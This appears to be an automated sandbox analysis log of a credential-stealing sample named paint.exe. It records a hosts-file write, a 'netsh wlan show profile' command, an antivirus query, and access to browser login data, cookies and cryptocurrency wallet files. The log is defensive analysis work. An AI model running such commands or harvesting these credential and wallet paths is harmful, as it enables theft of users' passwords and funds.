              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BDD080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6F0BDD080
              Source: C:\Users\user\Desktop\paint.exeCode function: 0_2_00007FF6F0BF5C70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF6F0BF5C70
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E148CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,88_2_00007FF623E148CC
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: C:\Users\user\Desktop\paint.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000000.00000003.1673300933.0000023393145000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2003846185.000002077225D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1673300933.0000023393147000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: paint.exe PID: 6716, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: paint.exe PID: 2132, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI67162\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: paint.exe PID: 2132, type: MEMORYSTR
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Electrum
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: fJaxx
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Exodus
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Ethereum
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.defaultJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqliteJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqliteJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqliteJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqliteJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqliteJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqliteJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqliteJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
